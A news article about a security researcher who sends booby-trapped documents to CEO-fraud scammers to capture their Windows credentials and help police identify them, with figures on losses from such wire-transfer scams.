HITB Florian Lukavsky hacks criminals profiting from out-of-control multi-billion dollar CEO wire transfer scams… and they hate him for it.
The director of SEC Consult’s Singapore office has made a name striking back at so-called “whaling” scammers by sending malicious Word documents that breach their Windows 10 boxes and pass on identity information to police.
Whaling is a well-oiled social engineering scam that sees criminals dupe financial controllers at large lucrative organisations. Whalers’ main method is to send emails that appear to originate from chief executive officers, bearing instructions to wire cash into nominated bank accounts.
It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which shipped and by dumb luck recouped $3m its executive sent to a hacker’s Chinese bank account; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.
They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.
Lukavsky told The Reg of his work on the back of his presentation at August’s Hack in the Box in Singapore, where he explained that he uses the attacker’s tactics to compromise scammers’ Microsoft accounts.
“Someone impersonated the CEO of an international company requesting urgent wire transfers and a couple of hours later they realise it was a scam … we worked together with law enforcement to trick the fraudsters,” Lukavsky says.
“We sent them a prepared PDF document pretending to be transaction confirmation and they opened it which led to Twitter handles, usernames, and identity information.”
“We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook.”
Those Windows 10 password hashes only last a few hours when subjected to tools like John the Ripper.
The information Lukavsky passed on to police from that attack late last year lead to the arrest of the scammers located in Africa.